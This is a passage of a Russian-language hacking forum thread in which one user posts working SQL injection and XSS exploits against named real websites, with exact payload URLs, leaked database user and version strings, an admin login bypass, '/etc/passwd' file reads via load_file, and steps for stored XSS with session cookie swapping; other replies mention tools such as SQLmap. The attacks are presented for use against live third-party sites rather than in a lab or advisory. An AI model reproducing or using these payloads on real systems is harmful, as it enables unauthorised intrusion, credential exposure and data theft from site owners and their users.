Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    SQLi Error base внедрение двойным запросом.
    Code:
    http://www.hairboutique.com/glossary/Detail.php?Keyword=Dimethicone Copolyol Meadowfoamate' and (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) and '1'='1
    root@HB-85|file_priv Y|5.5.19|Win64x86|
     
  2. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Сайт: russikona.ru ТИЦ 160
    SQLi Error base
    russikon_db@localhost|file_priv N|5.5.52-cll-lve|Linux|MySQL Community Server (GPL)|x86_64|
    Code:
    http://www.russikona.ru/news.php?id=198' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='admin' limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
    XSS-reflected:
    Code:
    http://www.russikona.ru/news.php?id=198%27%3e%3cbody+onload%3dalert(document.cookie)%3e
    Надеюсь ничьих чувств не оскорбил :)
     
    artkar likes this.
  3. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Сайт: rakuraku-home.jp
    SQLi Error base через POST
    [email protected]|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)|
    Уязвимые параметры account и password
    В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру
    эксплоит:
    Code:
    URL:http://www.rakuraku-home.jp/system/login/login.php
    POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #
    вход в админку логин и пароль 1' or '1
    Админка:
    Code:
    http://www.rakuraku-home.jp/system/
     
    artkar likes this.
  4. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Парочка сайтов с финансовой тематикой
    Сайт: eltee.de
    SQL Injection через GET, уязвимый параметр id, вывод в title
    pc-linux-gnu:i686:[email protected]:db456679871:5.1.73
    эксплоит:
    Code:
    view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@version_compile_machine,0x3a,user(),0x3a,database(),0x3a,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
    Сайт: businesstoday.lk
    SQL Injection через GET, уязвимый параметр issue
    5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i686:/usr
    эксплоит:
    Code:
    http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,user(),0x3a,@@version_compile_os,0x3a,@@version_compile_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
     
  5. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Шоп с 3d принтерами и всяким оборудованием
    Сайт: smtmax.com
    SQL Injection через GET, уязвимый параметр act
    Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtmax:5.6.35:/usr
    эксплоит:
    Code:
    http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile_os%2c0x3a%2c%40%40version_compile_machine%2c0x3a%2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40version%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2))a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b)%2b%27
    Сайт адалт тематики: straightpornstuds.com
    Примерные данные за день
    Посетителей: 1469
    Просмотров: 5878
    Boolean Based SQL Injection
    5.0.96 log:str5lt3m [email protected]:str5lt3m1 2
    Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true"
    Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false"
    эксплоит:
    Code:
    http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1))=115).html
    P.s. когда true страничка может долго подгружаться.
     
    #265 Печа, 19 May 2017
    Last edited: 19 May 2017
    Coost, ACat, BFM and 2 others like this.
  6. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Щоп с компьютерными аксессуарами
    Сайт: groupgear.co.uk
    MS SQL Injection через POST
    уязвимый параметр inputsearch
    microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 <x64> (build 9200: ) (hypervisor)|
    computergear2012|computerSQL2014
    эксплоит:
    Code:
    URL:http://www.groupgear.co.uk/searchResults.asp
    POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='
     
  7. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Сайт: magiclantern.org.uk
    Boolean Based SQL Injection черз GET, уязвимый параметр id
    5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_db1
    Если есть пост с заголовком The Temple of Minerva "true"
    Если нет поста с заголовком The Temple of Minerva "false"
    Эксплоит:
    Code:
    http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)
    Stored XSS:
    Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject
    Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере
    Code:
    URL:http://www.magiclantern.org.uk/contact.php
    payload: "><img src=ssds onerror=alert(666) width=0 height=0>
    Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот
    Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,
    например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk
    в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    НУ я так и знал. А вам слабо самому что-то найти и сделать? Вы попробуйте, я уверен вы сможете. Я просто не понимаю, я конечно не профи, но я невкуриваю, зачем крутить как слепую когда есть вывод. А вообще, скажи мне , что это а инструмент такой?
    Там ещё мод сек, только что он делает я не понял
    [​IMG]
     
    #268 BabaDook, 22 May 2017
    Last edited: 22 May 2017
    Печа likes this.
  9. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Code:
    http://www.magiclantern.org.uk/sales/publications.php?id=-1 union all select 1,2,USER(),@@version,database(),@@basedir,@@version_compile_os,@@version_compile_machine,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 --+
    Так лучше ? ))
     
  10. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    burpsuite, SQLmap, Netsparker
     
  11. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    SQLi с чтением файла из файловой системы и file_priv Y
    Сайт:eohu.ca
    Уязвимый параметор: newsID через GET
    root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y
    root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64
    Эксплоит:
    Code:
    http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file('/etc/passwd') from mysql.user --+
     
  12. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    SQLi с чтением файла из файловой системы
    Сайт:bbgv.org
    Уязвимый параметор: cat_id через GET
    root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N
    root@localhost:5.1.73:redhat-linux-gnu:x86_64
    Эксплоит:
    Code:
    view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9,10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+
     
  13. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Сайт:salut.ru ТИЦ 475
    SQLi Error base черз GET, уязвимый параметр SectionId
    salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/
    Эксплоит:
    Code:
    http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
    Сайт:irbis-opt.ru ТИЦ 20 Всякие палатки и спортивная снаряга
    SQLi черз GET, уязвимый параметр idd
    [email protected]:10.1.22-MariaDB:Linux:x86_64:/usr
    Эксплоит:
    Code:
    http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+
    Сайт:economic-study.ru ТИЦ 10 Вузы Москвы
    SQLi черз GET, уязвимый параметр ID
    vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr
    Эксплоит:
    Code:
    http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compile_os,@@version_compile_machine,@@basedir,10 --+
     
  14. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    .ru саиты запрещены
     
    Veil likes this.
  15. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Я когда форум просматривал, посты с .ru часто попадались, или это новые правила?
    Если админы скажут не вопрос, удалю свой пост.

    Да и софтом я в .ru не лазил, искал через дорки и крутил руками
     
    #275 Печа, 25 May 2017
    Last edited: 25 May 2017
  16. Печа

    Печа Member

    Joined:
    9 May 2015
    Messages:
    39
    Likes Received:
    23
    Reputations:
    17
    Сайт:ene.com.tw
    SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
    root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
    enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
    Эксплоит:
    Code:
    http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
     
    palec2006 and Imperou$ like this.
  17. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
  18. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Vip77, BigBear, Coost and 1 other person like this.
  19. paponi

    paponi New Member

    Joined:
    30 May 2017
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
  20. x4t3a

    x4t3a New Member

    Joined:
    14 Feb 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
Loading...
Similar Threads - Уязвимости SQLi
  1. zase
    Replies:
    1
    Views:
    3,036
  2. Shadows_God
    Replies:
    14
    Views:
    6,765